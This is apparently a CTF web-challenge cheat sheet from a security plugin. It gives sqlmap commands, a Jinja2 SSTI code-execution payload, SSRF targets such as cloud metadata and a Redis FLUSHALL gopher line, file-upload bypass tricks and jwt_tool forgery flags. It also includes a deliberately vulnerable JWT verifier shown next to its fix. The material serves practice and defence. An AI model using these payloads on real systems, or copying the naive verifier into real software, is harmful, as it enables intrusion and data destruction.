From cybersec-toolkit
Provides a decision tree and tool stack for solving CTF web challenges including SQLi, XSS, SSRF, SSTI, IDOR, auth bypass, file upload, deserialization, prototype pollution, race conditions, and JWT attacks.
Slash command: `/cybersec-toolkit:ctf-web`
```bash
# Always start with these — in parallel
# run_tool(...) lines go through the toolkit's tool registry, not the shell
curl -sI http://target/                                  # headers
run_tool("ffuf", "-w wordlist -u http://target/FUZZ")    # dir bust
run_tool("gobuster", "dir -u http://target -w wordlist")
run_tool("whatweb", "http://target")                     # tech stack
nikto -h http://target                                   # web scanner
```

- Source view: `view-source:` for comments, hidden inputs, JS files
- /robots.txt, /sitemap.xml, /.git/, /.env, /.DS_Store
- wappalyzer / whatweb for the stack; frameworks dictate the attack class

For each endpoint:
| Symptom | Likely class | Tool |
|---|---|---|
| Input echoed in HTML | XSS | manual + XSStrike |
| Error contains SQL | SQLi | sqlmap (registry) |
| URL parameter triggers fetch | SSRF | manual + gopherus for protocols |
| Template syntax `{{7*7}}` → 49 | SSTI | tplmap, manual jinja2/twig payloads |
| Numeric ID in URL/body | IDOR | manual enum + Burp Repeater |
| Login form, error tells "user not found" vs "wrong pass" | User enum | manual |
| File upload | Upload bypass | BurpSuite, manual extension/MIME tricks |
| `Cookie:` with base64/JSON | Cookie tampering | manual |
| `Authorization: Bearer eyJ...` | JWT | jwt_tool, jwt-cracker |
| `__proto__` or `constructor` accepted | Prototype pollution | manual JS payloads |
| Race-prone action (claim, vote) | Race condition | turbo-intruder Burp ext |
| Java/PHP/Ruby with unsafe deserialize | Deserialization | ysoserial, phpggc |
```bash
# Boolean-based, time-based, UNION
sqlmap -u "http://target/page?id=1" --batch --level=5 --risk=3 --dbs
# Cookie/header injection
sqlmap -u http://target/ --cookie="session=*" --level=5
# POST data
sqlmap -u http://target/login --data="user=*&pass=*"
```
Identify the engine first: `{{7*7}}` works in Jinja/Twig, `${7*7}` in FreeMarker, `<%= 7*7 %>` in ERB.
Jinja2 RCE: `{{ ''.__class__.__mro__[1].__subclasses__() }}` — find subprocess/Popen.
SSRF targets:
- http://169.254.169.254/latest/meta-data/
- http://127.0.0.1:port/
- gopher://localhost:6379/_FLUSHALL for redis

File upload bypass, try in order: rename extension (.php → .phtml/.php5/.phar), MIME spoofing, double extension (file.jpg.php), null byte (file.php%00.jpg), magic byte prefix, .htaccess upload, polyglot (PHP-in-JPG).
```bash
jwt_tool <token>                        # decode + check
jwt_tool <token> -X a                   # alg=none
jwt_tool <token> -X i                   # inject inline JWKS
jwt_tool <token> -X k -pk public.pem    # key confusion (RS→HS)
jwt-cracker <token> -d wordlist.txt     # crack HMAC secret
```
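What the alg=none and key-confusion checks above are probing for is a verifier that lets the token's own header choose the algorithm. This added example (not part of the toolkit) shows that vulnerable pattern beside the pinned-algorithm fix, using only the Python standard library; the secret and claims are constructed for the demo.

```python
import base64, hashlib, hmac, json

def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _unb64url(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def _mac(secret: bytes, head: str, body: str) -> bytes:
    return hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha256).digest()

def sign_hs256(payload: dict, secret: bytes) -> str:
    """Mint a legitimate HS256 token (constructed sample for the demo)."""
    head = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url(json.dumps(payload).encode())
    return f"{head}.{body}.{_b64url(_mac(secret, head, body))}"

def forge_alg_none(payload: dict) -> str:
    """Shape of the token jwt_tool -X a emits: alg=none and an empty signature."""
    head = _b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{head}.{_b64url(json.dumps(payload).encode())}."

def verify_naive(token: str, secret: bytes):
    """Vulnerable: the untrusted header picks the algorithm. Returns claims or None."""
    head, body, sig = token.split(".")
    if json.loads(_unb64url(head)).get("alg") == "none":   # attacker-selectable
        return json.loads(_unb64url(body))                 # MAC never checked
    if not hmac.compare_digest(_mac(secret, head, body), _unb64url(sig)):
        return None
    return json.loads(_unb64url(body))

def verify_pinned(token: str, secret: bytes):
    """Hardened: server pins HS256, so alg=none and RS->HS key confusion both fail."""
    head, body, sig = token.split(".")
    if json.loads(_unb64url(head)).get("alg") != "HS256":
        return None
    if not hmac.compare_digest(_mac(secret, head, body), _unb64url(sig)):
        return None
    return json.loads(_unb64url(body))

def demo(secret: bytes = b"constructed-demo-secret") -> dict:
    good = sign_hs256({"user": "alice", "admin": False}, secret)
    forged = forge_alg_none({"user": "alice", "admin": True})
    head, _, sig = good.split(".")   # real signature, swapped claims
    tampered = f"{head}.{_b64url(json.dumps({'admin': True}).encode())}.{sig}"
    return {
        "pinned_accepts_valid": verify_pinned(good, secret) == {"user": "alice", "admin": False},
        "naive_accepts_forged": verify_naive(forged, secret) == {"user": "alice", "admin": True},
        "pinned_rejects_forged": verify_pinned(forged, secret) is None,
        "pinned_rejects_tampered": verify_pinned(tampered, secret) is None,
    }
```

The same pinning is what a library's `algorithms=[...]` allow-list does; a decoder that reads `alg` from the header to decide how to verify is the bug to look for.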
whatweb (move on)
curl or Burp Repeater
Use the writeup-template skill.
Install:
```bash
npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkit
```